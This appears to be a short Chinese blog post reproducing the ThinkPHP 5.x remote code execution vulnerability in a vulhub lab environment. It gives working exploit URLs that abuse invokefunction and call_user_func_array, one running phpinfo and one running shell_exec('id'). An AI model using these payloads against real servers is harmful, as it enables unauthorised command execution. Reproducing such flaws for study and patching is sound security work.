vulhub中ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

1.环境启动后,访问http://your-ip:8080即可看到ThinkPHP默认启动页面。

2.直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:

复制代码
http://192.168.188.139:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id
相关推荐
运筹vivo@8 小时前
BUUCTF: [BSidesCF 2020]Had a bad day
web安全·ctf
浩浩测试一下10 小时前
DDOS 应急响应Linux防火墙 Iptable 使用方式方法
linux·网络·安全·web安全·网络安全·系统安全·ddos
浩浩测试一下11 小时前
洪水猛兽攻击 Ddos Dos cc Drdos floods区别
安全·web安全·网络安全·系统安全·wpf·可信计算技术·安全架构
运维行者_12 小时前
OpManager 自定义集成支持:革新您的 IT 工作流
运维·网络·人工智能·安全·web安全·自动化·自动化工作流
ByNotD0g13 小时前
CVE-2025-61882 漏洞复现(失败版)
java·web安全
emma羊羊14 小时前
【springrce】
网络·安全·web安全
运筹vivo@14 小时前
BUUCTF : [RoarCTF 2019]Easy Java
java·web安全·ctf
Jerry_Gao9211 天前
SQLI-Labs 1-26关通关详解
数据库·sql·web安全
乾元1 天前
隐蔽信道:利用 AI 调制技术构建难以检测的 C2 流量
运维·人工智能·网络协议·安全·web安全·机器学习·架构
浩浩测试一下1 天前
DDoS 攻击工具与僵尸网络详解
网络·安全·web安全·网络安全·系统安全·ddos·安全架构